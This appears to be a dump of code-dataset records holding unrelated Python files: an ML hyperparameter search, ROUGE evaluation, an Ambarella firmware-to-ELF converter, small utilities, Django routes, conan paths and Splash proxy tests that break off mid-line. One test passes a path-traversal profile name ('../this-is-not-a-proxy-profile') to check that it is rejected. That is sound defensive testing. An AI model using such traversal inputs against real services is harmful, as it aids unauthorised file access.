tf.keras.layers.GlobalAveragePooling2D() (tensor)\n elif pooling_type == \"glob_max\":\n tensor = tf.keras.layers.GlobalMaxPooling2D() (tensor)\n elif pooling_type == \"avg\":\n tensor = tf.keras.layers.AveragePooling2D() (tensor)\n elif pooling_type == \"max\":\n tensor = tf.keras.layers.MaxPooling2D() (tensor)\n \n tensor = tf.keras.layers.Flatten() (tensor)\n return tensor\n\ndef dense_choice(tensor, qtd_dense: int, filters: list, activation: str, dropout_value: int):\n for i in range(qtd_dense):\n tensor = tf.keras.layers.Dense(filters[i], activation=activation) (tensor)\n tensor = tf.keras.layers.Dropout(dropout_value) (tensor)\n \n return tensor\n\ndef block_change_choice(tensor, qtd_stacks, filters, layers):\n conv_numbers = 6\n for i in range(qtd_stacks):\n tensor = stack_block(tensor, filters[i], layers, name=\"conv{}\".format(conv_numbers+i))\n \n return tensor \n\nparam_space = {\n \"pooling\": hp.choice('pooling', ['avg', 'max', 'glob_avg', 'glob_max']),\n \"optmizer\": hp.choice('optmizer', ['adam', 'rmsprop']),\n \"loss\": hp.choice('loss', ['categorical_crossentropy']),\n \"unfreeze\": hp.choice('unfreeze', [0, 10, 15, 20, 30, 40]),\n \"stacks\": hp.choice('stacks', [\n {\n 'qtd_stacks': 0, \n 'filters': [],\n 'layers': []\n },\n {\n 'qtd_stacks': 1, \n 'filters': hp.choice('filters2', [[1024]]),\n 'layers': hp.choice('layers2', [3, 4, 6, 8, 23, 36])\n },\n {\n 'qtd_stacks': 2, \n 'filters': hp.choice('filters3', [[1024, 1024], [1024, 2048]]),\n 'layers': hp.choice('layers3', [3, 4, 6, 8, 23, 36])\n },\n ]),\n \"dense\": hp.choice('dense', [\n {\n 'qtd_dense': 1,\n 'filters': hp.choice('filters4', [[256], [512], [1024]]),\n 'activation': hp.choice('activation', ['relu', 'elu']),\n 'dropout': hp.choice('dropout', [0.5, 0.6, 0.7])\n },\n {\n 'qtd_dense': 2,\n 'filters': hp.choice('filters5', [[256, 256], [256, 512]]),\n 'activation': hp.choice('activation2', ['relu', 'elu']),\n 'dropout': hp.choice('dropout2', [0.5, 0.6, 0.7])\n },\n {\n 'qtd_dense': 3,\n 'filters': hp.choice('filters6', [[256, 256, 256], [256, 512, 1024]]),\n 'activation': hp.choice('activation3', ['relu', 'elu']),\n 'dropout': hp.choice('dropout3', [0.5, 0.6, 0.7])\n },\n {\n 'qtd_dense': 4,\n 'filters': hp.choice('filters7', [[256, 256, 256, 256], [256, 512, 1024, 2048]]),\n 'activation': hp.choice('activation4', ['relu', 'elu']),\n 'dropout': hp.choice('dropout4', [0.5, 0.6, 0.7])\n }\n ])\n}\n\ndef hyperopt_fitness(params: dict): \n res_model = tf.keras.applications.ResNet152(include_top=False, weights='imagenet', input_tensor=tf.keras.Input((355, 370, 3)))\n\n tensor = block_change_choice(res_model.output, params[\"stacks\"][\"qtd_stacks\"], params[\"stacks\"][\"filters\"], params[\"stacks\"][\"layers\"])\n tensor = pooling_choice(tensor, params[\"pooling\"])\n tensor = dense_choice(tensor, params[\"dense\"][\"qtd_dense\"], params[\"dense\"][\"filters\"], params[\"dense\"][\"activation\"], params[\"dense\"][\"dropout\"])\n tensor = tf.keras.layers.Dense(5, activation=\"softmax\") (tensor)\n\n model = tf.keras.Model(inputs=res_model.input, outputs=tensor)\n\n for layer in res_model.layers[params[\"unfreeze\"]:]:\n layer.trainable = False\n \n model.compile(optimizer=params[\"optmizer\"], loss=params[\"loss\"], metrics=['accuracy'])\n\n train_steps = 6177 / 3\n valid_steps = 1544 / 8\n # test_steps = 856 / 8\n\n model.fit(train_gen, epochs=30, steps_per_epoch=train_steps, validation_data=valid_gen, validation_steps=valid_steps, verbose=2, callbacks=[tf.keras.callbacks.EarlyStopping(patience=3)])\n \n _, acc = model.evaluate(test_gen, verbose=2)\n\n results = {\n 'loss': 1-acc,\n 'acurracy': acc,\n 'space': params,\n 'status': STATUS_OK\n }\n\n del model\n tf.keras.backend.clear_session()\n \n save_result(results)\n return results\n\ndef save_result(resultado):\n with open('resultados_resnet.csv','a', newline='') as results:\n writer = csv.writer(results) \n writer.writerow([resultado['acurracy'], resultado['loss'], resultado['space']])\n\ndef run_a_trial():\n try:\n trials = pickle.load(open(\"otimizacao_resnet.pkl\", \"rb\"))\n print(\"Encontrei uma otimização já salva! Carregando...\")\n max_evals = len(trials.trials) + 1\n print(\"Rodando a partir da {} iteração.\".format(\n len(trials.trials)))\n except:\n trials = Trials()\n print(\"Começando do zero.\")\n\n trials = Trials()\n best = fmin(hyperopt_fitness, \n param_space,\n algo=tpe.suggest, \n max_evals=1, \n trials=trials)\n \n pickle.dump(trials, open(\"otimizacao_resnet.pkl\", \"wb\"))\n\nwhile True:\n try:\n run_a_trial()\n except Exception as err:\n err_str = str(err)\n print(err_str)\n traceback_str = str(traceback.format_exc())\n print(traceback_str)","sub_path":"resnet/hyperopt.py","file_name":"hyperopt.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"284652323","text":"#!/usr/bin/env python3\n\nimport os\nfrom pyrouge import Rouge155\n\ndef remove_broken_files():\n error_id = []\n for f in os.listdir('outputs/ref'):\n try:\n open('outputs/ref/' + f).read()\n except:\n error_id.append(f)\n for f in os.listdir('outputs/hyp'):\n try:\n open('outputs/hyp/' + f).read()\n except:\n error_id.append(f)\n error_set = set(error_id)\n for f in error_set:\n os.remove('outputs/ref/' + f)\n os.remove('outputs/hyp/' + f)\n\ndef rouge():\n r = Rouge155()\n r.home_dir = '.'\n r.system_dir = 'outputs/hyp'\n r.model_dir = 'outputs/ref'\n\n r.system_filename_pattern = '(\\d+).txt'\n r.model_filename_pattern = '#ID#.txt'\n \n # command_75 = '-e pyrouge/tools/ROUGE-1.5.5/data -a -c 95 -m -n 2 -b 75'\n command_275 = '-e /home/vbee/tiennv/basicsum/pyrouge/tools/ROUGE-1.5.5/data -a -c 95 -m -n 2 -b 275'\n # command = '-e pyrouge/tools/ROUGE-1.5.5/data -a -c 95 -m -n 2'\n # output_75 = r.convert_and_evaluate(rouge_args=command_75)\n # output_275 = r.convert_and_evaluate(rouge_args=command_275)\n output = r.convert_and_evaluate(rouge_args=command_275)\n #output = r.convert_and_evaluate()\n # print(output)\n print(\"working\")\n # output_dict_75 = r.output_to_dict(output_75)\n # output_dict_275 = r.output_to_dict(output_275)\n output_dict = r.output_to_dict(output)\n # print(output_dict_75)\n # print(output_dict_275)\n print(output_dict)\n\nif __name__ == '__main__':\n remove_broken_files()\n rouge()\n","sub_path":"eval_275.py","file_name":"eval_275.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"603791157","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Ambarella Firmware SYS partiton to ELF converter\n\n Converts \"System Software\" partition from Ambarella a7/a9 firmware\n from a binary image form into ELF format. The ELF format can be then\n easily disassembled, as most tools can read ELF files.\n\n The Ambarella SDK contains an example system application, on which\n most products which use Ambarella SoC base their software.\n The application is linked and prepared like this:\n```\n /usr/bin/arm-none-eabi-ld \\\n -EL -p --no-undefined --gc-sections --no-wchar-size-warning \\\n -nostdlib -nodefaultlibs -nostartfiles \\\n -L/usr/lib/arm-none-eabi/lib/armv7-ar/thumb/fpu \\\n -L/usr/lib/gcc/arm-none-eabi/4.9.3/armv7-ar/thumb/fpu \\\n -o out/amba_app.elf -T ../output/app/amba_app.lds \\\n --start-group --whole-archive \\\n ../output/lib/libapp.a \\\n ../output/lib/libapplib.a \\\n ../vendors/ambarella/lib/libaudio.a \\\n ../vendors/ambarella/lib/libaudio_sys.a \\\n ../output/lib/libbsp.a \\\n [...]\n ../vendors/ambarella/lib/libthreadx.a \\\n ../vendors/ambarella/lib/libusb.a \\\n --no-whole-archive -lc -lnosys -lm -lgcc -lrdimon -lstdc++ \\\n --end-group \\\n app/AmbaVer_LinkInfo.o\n\n /usr/bin/arm-none-eabi-nm -n -l out/amba_app.elf\n\n /usr/bin/arm-none-eabi-objcopy -O binary out/amba_app.elf out/amba_app.bin\n```\n Note that the last command converts a linked ELF file into a binary memory\n image. The purpose of this tool is to revert that last operation, which makes\n it a lot easier to use tols like objdump or IDA Pro.\n\n The script uses an ELF template, which was prepared from example Ambarella SDK\n application by the command (mock_sect.bin is a random file with 32 bytes size):\n```\n echo \"MockDataToUpdateUsingObjcopy\" > mock_sect.bin\n /usr/bin/arm-none-eabi-objcopy \\\n --remove-section \".comment\" \\\n --update-section \".text=mock_sect.bin\" --change-section-address \".text=0xa0001000\" \\\n --change-section-address \".ARM.exidx=0xa0001020\" \\\n --update-section \".dsp_buf=mock_sect.bin\" --change-section-address \".dsp_buf=0xa0001020\" \\\n --update-section \".data=mock_sect.bin\" --change-section-address \".data=0xa0001040\" \\\n --change-section-address \"no_init=0xa0001060\" \\\n --change-section-address \".bss.noinit=0xa0004000\" \\\n --change-section-address \".bss=0xa03a8000\" \\\n amba_app.elf amba_sys2elf_template.elf\n```\n\n This tool really uses arm_bin2elf to do the work; it just sets optimal\n initial parameters for the Ambarella A9 firmware input.\n\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport getopt\nimport os\nimport re\nimport configparser\nimport itertools\n\nsys.path.insert(0, './')\nfrom arm_bin2elf import eprint, ProgOptions, armfw_bin2elf\n\ndef syssw_read_base_address(po):\n mem_addr = 0\n # Do not use basename - a9h file is in the same folder where a9s was\n fname = \"{:s}.a9h\".format(os.path.splitext(po.fwpartfile)[0])\n if (po.verbose > 1):\n print(\"{}: Opening {:s}\".format(po.fwpartfile,fname))\n parser = configparser.ConfigParser()\n with open(fname, \"r\") as lines:\n lines = itertools.chain((\"[asection]\",), lines) # This line adds section header to ini\n parser.read_file(lines)\n mem_addr = int(parser.get(\"asection\", \"mem_addr\"),16)\n del parser\n return mem_addr\n\ndef main(argv):\n \"\"\" Main executable function.\n\n Its task is to parse command line options and call a function which performs selected command.\n \"\"\"\n po = ProgOptions()\n # Set optimal options for Ambarella A9 ARM firmware\n po.elftemplate='amba_sys2elf_template.elf'\n po.inifile = '' # What differs Ambarella BIN from other BINs is INI file with base address inside\n po.address_base=0x1000000\n po.address_space_len=0x2000000 # 32MB\n po.expect_func_align = 4 # Full length instructions are used in Cortex A9 binary\n po.expect_sect_align = 0x20 # This is how sections are aligned in Ambarella SDK\n # Parse command line options\n try:\n opts, args = getopt.getopt(argv,\"hevt:p:l:b:s:o:\",[\"help\",\"version\",\"mkelf\",\"dry-run\",\"fwpart=\",\"template\",\"addrsplen=\",\"baseaddr=\",\"section=\",\"output=\"])\n except getopt.GetoptError:\n print(\"Unrecognized options; check amba_sys2elf.py --help\")\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n print(\"Ambarella Firmware SYS partiton to ELF converter\")\n print(\"amba_sys2elf.py <-e> [-v] -p [-o ] [-t ]\")\n print(\" -p - name of the firmware binary file\")\n print(\" -o - output file name\")\n print(\" -t - template file name\")\n print(\" -e - make ELF file from a binary image\")\n print(\" -l - set address space length; influences size of last section\")\n print(\" -b - set base address; first section will start at this memory location\")\n print(\" -v - increases verbosity level; max level is set by -vvv\")\n sys.exit()\n elif opt == \"--version\":\n print(\"amba_sys2elf.py version 0.2.0\")\n sys.exit()\n elif opt == \"-v\":\n po.verbose += 1\n elif opt == \"--dry-run\":\n po.dry_run = True\n elif opt in (\"-p\", \"--fwpart\"):\n po.fwpartfile = arg\n elif opt in (\"-o\", \"--output\"):\n po.outfile = arg\n elif opt in (\"-t\", \"--template\"):\n po.elftemplate = arg\n elif opt in (\"-l\", \"--addrsplen\"):\n po.address_space_len = int(arg,0)\n elif opt in (\"-b\", \"--baseaddr\"):\n po.address_base = int(arg,0)\n elif opt in (\"-s\", \"--section\"):\n arg_m = re.search('(?P[0-9A-Za-z._-]+)(@(?P[Xx0-9A-Fa-f]+))?(:(?P[Xx0-9A-Fa-f]+))?', arg)\n # Convert to integer, detect base from prefix\n if arg_m.group(\"pos\") is not None:\n po.section_pos[arg_m.group(\"name\")] = int(arg_m.group(\"pos\"),0)\n if arg_m.group(\"len\") is not None:\n po.section_size[arg_m.group(\"name\")] = int(arg_m.group(\"len\"),0)\n elif opt in (\"-e\", \"--mkelf\"):\n po.command = 'e'\n po.basename = os.path.splitext(os.path.basename(po.fwpartfile))[0]\n if len(po.fwpartfile) > 0 and len(po.inifile) == 0:\n po.inifile = po.basename + \".a9h\"\n if len(po.fwpartfile) > 0 and len(po.outfile) == 0:\n po.outfile = po.basename + \".elf\"\n if (po.command == 'e'):\n\n if (po.verbose > 0):\n print(\"{}: Opening for conversion to ELF\".format(po.fwpartfile))\n # read base address from INI file which should be there after AMBA extraction\n po.address_base = syssw_read_base_address(po)\n fwpartfile = open(po.fwpartfile, \"rb\")\n\n armfw_bin2elf(po,fwpartfile)\n\n fwpartfile.close();\n\n else:\n\n raise NotImplementedError('Unsupported command.')\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"amba_sys2elf.py","file_name":"amba_sys2elf.py","file_ext":"py","file_size_in_byte":6680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"337199832","text":"import sys\ndef main():\n log = []\n # for line in sys.stdin:\n logfile = open('/Users/hgoscenski/Desktop/doorman.2.in', 'r')\n for line in logfile:\n log.append(line)\n men = 0\n women = 0\n maxdiff = int(log[0])\n \nmain()\n","sub_path":"doorman.py","file_name":"doorman.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"635067226","text":"import numpy as np\nimport math\nimport Box2D\nfrom Box2D.b2 import (fixtureDef, polygonShape, )\nfrom utils import UserData, COLOR_BLACK\n\nSIZE = 0.001\nBULLET_BOX = [(0,0),(2,-0.08),(2,0.08)]\nRADIUS_START = 0.9\n\n\nclass Projectile:\n def __init__(self, world):\n self.__world = world\n self.__projectile = {}\n self.__ctr = 1\n self.__fixture_bullet = [fixtureDef(\n shape=polygonShape(vertices=BULLET_BOX),\n categoryBits=0x02,\n maskBits=0xFD,\n density=1e-6\n )]\n\n def shoot(self, robot, init_angle, init_pos):\n angle = init_angle\n x, y = init_pos\n x += math.cos(angle) * RADIUS_START\n y += math.sin(angle) * RADIUS_START\n userData = UserData(\"bullet\", self.__ctr)\n self.__fixture_bullet[0].userData = userData\n projectile = self.__world.CreateDynamicBody(\n position=(x, y),\n angle=angle,\n fixtures=self.__fixture_bullet,\n )\n #bullet.bullet = True\n if robot.robot_id == 0:\n # projectile.color = (0.5,0.8,0.4) #green\n projectile.color = (0.9, 0.5, 0.4)\n if robot.robot_id == 1:\n #projectile.color = (0.5,0.8,0.4)\n projectile.color = (0.5, 0.7, 0.9)\n #bullet.userData = userData\n projectile.linearVelocity = (math.cos(angle)*5, math.sin(angle)*5)\n self.__projectile[self.__ctr] = projectile\n self.__ctr += 1\n\n def draw(self, viewer):\n for obj in self.__projectile.values():\n for f in obj.fixtures:\n trans = f.body.transform\n path = [trans*v for v in f.shape.vertices]\n viewer.draw_polygon(path, color=obj.color)\n\n def destroyById(self, bullet_id):\n body = self.__projectile.pop(bullet_id, None)\n if body is not None:\n self.__world.DestroyBody(body)\n\n def destroy(self):\n for bullet in self.__projectile.values():\n self.__world.DestroyBody(bullet)\n self.__projectile = {}\n","sub_path":"first-edition/battlefield/body/projectile.py","file_name":"projectile.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"287689696","text":"from django.urls import path, re_path\nfrom . import views\nfrom .views import MyClubListView, MyClubDetailView, MyClubUpdateEvent, MyClubDeleteEvent, \\\n MyClubCreateEvent, Event_view\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('add_venue/', views.add_venue, name='add-venue'),\n #path('events/', views.all_events, name='show-event'),\n path('getsubs/', views.list_subscribers, name='list-subscribers'),\n path('events_view/', Event_view.as_view()),\n path('allevents/', views.all_events, name='all-events'),\n path('event/', MyClubDetailView.as_view(), name='event-detail'),\n path('events/', MyClubListView.as_view(), name='show-events'),\n path('event/add/', MyClubCreateEvent.as_view(), name='add-event'),\n path('event/update/', MyClubUpdateEvent.as_view(), name='update-event'),\n path('event/delete/', MyClubDeleteEvent.as_view(), name='delete-event'),\n re_path(r'^(?P[0-9]{4})/(?P0?[1-9]|1[0-2])/', views.index, name='index'),\n ]\n","sub_path":"events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"615374962","text":"import os\nfrom conans.util.files import save, load\nfrom conans.paths import StorePaths\nfrom conans.model.settings import Settings\nfrom conans.client.conf import ConanClientConfigParser, default_client_conf, default_settings_yml\nfrom conans.model.values import Values\nfrom conans.client.detect import detect_defaults_settings\nfrom conans.client.short_paths_conf import ShortPathsReferences\n\nCONAN_CONF = 'conan.conf'\nCONAN_SETTINGS = \"settings.yml\"\nLOCALDB = \".conan.db\"\nREGISTRY = \"registry.txt\"\n\n\nclass ConanPaths(StorePaths):\n \"\"\" Class to represent/store/compute all the paths involved in the execution\n of conans commands\n \"\"\"\n def __init__(self, base_folder, store_folder, output):\n self.conan_folder = os.path.join(base_folder, \".conan\")\n self._conan_config = None\n self._settings = None\n self._output = output\n self._store_folder = store_folder or self.conan_config.storage_path or self.conan_folder\n self._short_paths_refs = None\n StorePaths.__init__(self, self._store_folder, self.short_paths_refs)\n\n @property\n def short_paths_refs(self):\n if self._short_paths_refs is None:\n self._short_paths_refs = ShortPathsReferences(self.conan_folder)\n return self._short_paths_refs\n\n @property\n def registry(self):\n return os.path.join(self.conan_folder, REGISTRY)\n\n @property\n def conan_config(self):\n def generate_default_config_file():\n default_settings = detect_defaults_settings(self._output)\n default_setting_values = Values.from_list(default_settings)\n client_conf = default_client_conf + default_setting_values.dumps()\n save(self.conan_conf_path, client_conf)\n\n if not self._conan_config:\n if not os.path.exists(self.conan_conf_path):\n generate_default_config_file()\n\n self._conan_config = ConanClientConfigParser(self.conan_conf_path)\n\n return self._conan_config\n\n @property\n def localdb(self):\n return os.path.join(self.conan_folder, LOCALDB)\n\n @property\n def conan_conf_path(self):\n return os.path.join(self.conan_folder, CONAN_CONF)\n\n @property\n def settings_path(self):\n return os.path.join(self.conan_folder, CONAN_SETTINGS)\n\n @property\n def settings(self):\n \"\"\"Returns {setting: [value, ...]} defining all the possible\n settings and their values\"\"\"\n if not self._settings:\n if not os.path.exists(self.settings_path):\n save(self.settings_path, default_settings_yml)\n settings = Settings.loads(default_settings_yml)\n else:\n content = load(self.settings_path)\n settings = Settings.loads(content)\n settings.values = self.conan_config.settings_defaults\n self._settings = settings\n return self._settings\n","sub_path":"conans/client/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"276079168","text":"class Solution:\n def twoSum(self, nums: list, target: int) -> list:\n for i in range(len(nums) - 1):\n a = nums[i]\n for j in range(i + 1, len(nums)):\n if nums[j] == target - a:\n return [i, j]\n\n def twoSum2(self, nums: list, target: int) -> list:\n mp = {}\n for index, value in enumerate(nums):\n if target - value in mp.keys():\n return [mp[target - value], index]\n mp[value] = index\n return []\n\n\ns = Solution()\nx = s.twoSum([3, 2, 4], 6)\ny = s.twoSum2([2, 3, 2, 4], 6)\nprint(x)\nprint(y)\n","sub_path":"leetcode/01_两数之和.py","file_name":"01_两数之和.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"239082864","text":"# -*-coding:utf-8-*-\r\n\r\n'''\r\n用最少数量的箭引爆气球:\r\n在二维空间中有许多球形的气球。对于每个气球,提供的输入是水平方向上,气球直径的开始和结束坐标。由于它是水平的,所以y坐标\r\n并不重要,因此只要知道开始和结束的x坐标就足够了。开始坐标总是小于结束坐标。平面内最多存在104个气球。\r\n一支弓箭可以沿着x轴从不同点完全垂直地射出。在坐标x处射出一支箭,若有一个气球的直径的开始和结束坐标为 xstart,xend, 且满\r\n足 xstart ≤ x ≤ xend,则该气球会被引爆。可以射出的弓箭的数量没有限制。 弓箭一旦被射出之后,可以无限地前进。我们想找到\r\n使得所有气球全部被引爆,所需的弓箭的最小数量。\r\n'''\r\n\r\n'''\r\n解题思路:\r\n1、将气球按xstart从小到大排序,因为气球的坐标没变,所以排序并不会影响气球的位置,排序的目的是为了方便从xstart最小的气球射击\r\n2、选从xstart最小的气球某点位置开始射击,遍历后面的气球有没有和它重合的,即正在遍历的气球的最xend是否和下一气球的xstart重合,如果重合那么这个气球也被引爆,\r\n 这时需要更新射击的最优位置,即上一个气球和下一个气球xend最小的那个位置,如果不重合,那么就将发射下一支箭,那么射击位置就更新到下一支箭,又重复前面的比较\r\n'''\r\n\r\n\r\nclass Solution(object):\r\n\r\n def findMinArrowShots(self, points):\r\n if [] == points:\r\n return 0\r\n self.space = sorted(points, key=lambda x: (x[0], x[1]))\r\n arrow_e = self.space[0][1]\r\n print(self.space)\r\n shot = 1\r\n for i in range(1, len(self.space)):\r\n ball = self.space[i]\r\n if ball[0] <= arrow_e:\r\n arrow_e = min(arrow_e, ball[1])\r\n else:\r\n shot += 1\r\n arrow_e = ball[1]\r\n return shot\r\n\r\n\r\n# p = [[10,16], [2,8], [1,6], [7,12]]\r\n# p = [[1,2147483647]]\r\n# p = [[3,9],[7,12],[3,8],[6,8],[9,10],[2,9],[0,9],[3,9],[0,6],[2,8]]\r\n# p = [[-1,1],[0,1],[2,3],[1,2]]\r\np = [[9, 12], [1, 10], [4, 11], [8, 12], [3, 9], [6, 9], [6, 7]]\r\nobj = Solution()\r\nprint(obj.findMinArrowShots(p))\r\n","sub_path":"python/finished/algorithm/greed.py","file_name":"greed.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"92950778","text":"#!/usr/bin/python3\nimport sqlite3\nimport time\nimport os\nimport record\nfrom time import strftime\n\nundo_cash = 666\nbb=0.00\nwhile(1):\n #bb = 0.0\n #blinds = [0.02, 0.05, 0.1, 0.16, 0.25, 0.5, 1, 2, 4, 6, 10, 20, 50, 100, 200, 400]\n #while(bb not in blinds):\n #try:\n #bb = float(input(\"[CASH] enter big blind: \")) #0.02 0.05 0.1 0.16 0.25 0.5 1 2 4 6 10 20 50 100 200 400\n #except ValueError:\n #print(\"[CASH] not a valid bb\")\n #quit()\n try:\n buyin = float(input(\"[CASH] enter buyin: \"))\n except ValueError:\n print(\"[CASH] not a valid buyin\")\n quit()\n if buyin < 0:\n #undo\n if undo_cash == 666:\n print(\"[CASH] no undo option\")\n quit()\n else:\n connection = sqlite3.connect(\"cash.db\")\n cursor = connection.cursor()\n cursor.execute(\"UPDATE stats SET balance=?\", (undo_cash,))\n connection.commit()\n connection.close()\n record.undo()\n print(\"[CASH] undo done\")\n try:\n buyin = float(input(\"[CASH] enter buyin: \"))\n except ValueError:\n print(\"[CASH] not a valid buyin\")\n quit()\n if buyin < 0:\n print(\"[CASH] not a valid buyin\")\n quit()\n current_bankroll = record.read_rec()\n current_bankroll -= buyin\n time.time()\n timestamp1 = time.time()\n try:\n money_left = float(input(\"[CASH] enter money left: \"))\n except ValueError:\n money_left = 0.0\n timestamp2 = time.time()\n current_bankroll = round(current_bankroll + money_left, 3)\n record.rec(current_bankroll)\n profit = round(money_left - buyin, 3)\n pokertime = round((timestamp2 - timestamp1)/60,2)\n #print(\"[CASH] time played this session: \" + str(pokertime))\n #print(\"[CASH] profit this session: \" + str(profit))\n connection = sqlite3.connect(\"cash.db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT time FROM stats\")\n result = cursor.fetchall()\n connection.close()\n for r in result:\n since = r[0]\n pokertime = round(pokertime + since, 3)\n connection = sqlite3.connect(\"cash.db\")\n cursor = connection.cursor()\n cursor.execute(\"SELECT balance FROM stats\")\n result = cursor.fetchall()\n connection.close()\n for r in result:\n cash = r[0]\n undo_cash = cash\n profit = round(profit + cash, 3)\n #print(\"[CASH] played time before: \" + str(round(since, 3)))\n #print(\"[CASH] cash before: \" + str(round(cash, 3)))\n #print(\"[CASH] played sum: \" + str(pokertime))\n #print(\"[CASH] cash now: \" + str(profit))\n connection = sqlite3.connect(\"cash.db\")\n cursor = connection.cursor()\n cursor.execute(\"UPDATE stats SET time=?, balance=?\", (pokertime, profit,))\n connection.commit()\n connection.close()\n print(strftime(\"%m/%d/%Y %H:%M\"))\n","sub_path":"cash.py","file_name":"cash.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"532638794","text":"def readrandom():\n total = 0\n howmany = 0\n with open('numbers.txt') as infile:\n for line in infile:\n try:\n num = int(line)\n total += num\n howmany += 1\n except IOError as ercode:\n print(\"Error:\",str(ercode))\n except ValueError:\n print('Error:this is not a number')\n\n print(total/howmany)\nreadrandom()","sub_path":"python/kp2/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"568170391","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nimport os\nimport shutil\nimport unittest\nimport requests\nfrom splash.proxy import _BlackWhiteSplashProxyFactory, ProfilesSplashProxyFactory\nfrom splash.tests.test_render import BaseRenderTest\nfrom splash.tests.utils import TestServers\n\n\nclass BlackWhiteProxyFactoryTest(unittest.TestCase):\n\n def _factory(self, **kwargs):\n params = {\n \"proxy_list\": [(\"proxy.crawlera.com\", 8010, \"username\", \"password\")],\n \"whitelist\": [\n r\".*scrapinghub\\.com.*\",\n ],\n \"blacklist\": [\n r\".*\\.js\",\n r\".*\\.css\",\n ]\n }\n params.update(kwargs)\n return _BlackWhiteSplashProxyFactory(**params)\n\n def test_noproxy(self):\n f = _BlackWhiteSplashProxyFactory()\n self.assertFalse(f.shouldUseProxyList('http', 'crawlera.com'))\n\n def test_whitelist(self):\n self.assertUsesCustom('http://www.scrapinghub.com')\n self.assertUsesDefault('http://www.google-analytics.com/ga.js')\n self.assertUsesDefault('http://crawlera.com')\n\n def test_blacklist(self):\n self.assertUsesDefault('http://www.scrapinghub.com/static/styles/screen.css')\n\n def test_no_whitelist(self):\n self.assertUsesCustom('http://crawlera.com', whitelist=[])\n self.assertUsesDefault('http://www.google-analytics.com/ga.js', whitelist=[])\n\n\n def assertUsesDefault(self, url, protocol='http', **kwargs):\n f = self._factory(**kwargs)\n self.assertFalse(f.shouldUseProxyList(protocol, url))\n\n def assertUsesCustom(self, url, protocol='http', **kwargs):\n f = self._factory(**kwargs)\n self.assertTrue(f.shouldUseProxyList(protocol, url))\n\n\nclass BaseHtmlProxyTest(BaseRenderTest):\n use_gzip = False # our simple testing proxy dosn't work with gzip\n\n def assertProxied(self, html):\n assert 'PROXY_USED' in html\n\n def assertNotProxied(self, html):\n assert 'PROXY_USED' not in html\n\n\nclass HtmlProxyRenderTest(BaseHtmlProxyTest):\n\n def test_proxy_works(self):\n r1 = self.request({'url': self.mockurl('jsrender')})\n self.assertNotProxied(r1.text)\n\n r2 = self.request({'url': self.mockurl('jsrender'), 'proxy': 'test'})\n self.assertProxied(r2.text)\n\n def test_blacklist(self):\n params = {'url': self.mockurl('iframes'),\n 'proxy': 'test', 'html': 1, 'iframes': 1}\n r = self.request(params, endpoint='render.json')\n data = r.json()\n\n # only 1.html is blacklisted in test.ini\n self.assertProxied(data['html'])\n assert any('1.html' in f['requestedUrl'] for f in data['childFrames'])\n\n for frame in data['childFrames']:\n if '1.html' in frame['requestedUrl']:\n self.assertNotProxied(frame['html'])\n else:\n self.assertProxied(frame['html'])\n\n def test_insecure(self):\n r = self.request({'url': self.mockurl('jsrender'),\n 'proxy': '../this-is-not-a-proxy-profile'})\n self.assertStatusCode(r, 400)\n self.assertEqual(r.text.strip(), ProfilesSplashProxyFactory.NO_PROXY_PROFILE_MSG)\n\n\n def test_nonexisting(self):\n r = self.request({'url': self.mockurl('jsrender'),\n 'proxy': 'nonexisting'})\n self.assertStatusCode(r, 400)\n self.assertEqual(r.text.strip(), ProfilesSplashProxyFactory.NO_PROXY_PROFILE_MSG)\n\n def test_no_proxy_settings(self):\n r = self.request({'url': self.mockurl('jsrender'),\n 'proxy': 'no-proxy-settings'})\n self.assertStatusCode(r, 400)\n\n\nclass HtmlProxyDefaultProfileTest(BaseHtmlProxyTest):\n\n def ts2_request(self, ts2, query, endpoint='render.html'):\n url = \"http://localhost:%s/%s\" % (ts2.splashserver.portnum, endpoint)\n return requests.get(url, params=query)\n\n def create_default_ini(self, ts2):\n src = os.path.join(ts2.proxy_profiles_path, 'test.ini')\n dst = os.path.join(ts2.proxy_profiles_path, 'default.ini')\n shutil.copyfile(src, dst)\n\n def remove_default_ini(self, ts2):\n dst = os.path.join(ts2.proxy_profiles_path, 'default.ini')\n os.unlink(dst)\n\n def test_ts_setup(self):\n with TestServers() as ts2:\n r1 = self.ts2_request(ts2, {'url': ts2.mockserver.url('jsrender', gzip=False)})\n self.assertNotProxied(r1.text)\n\n r2 = self.ts2_request(ts2, {\n 'url': ts2.mockserver.url('jsrender', gzip=False),\n 'proxy': 'test',\n })\n self.assertProxied(r2.text)\n\n def test_default_profile_works(self):\n with TestServers() as ts2:\n self.create_default_ini(ts2)\n try:\n # default.ini present, proxy is used by default\n r1 = 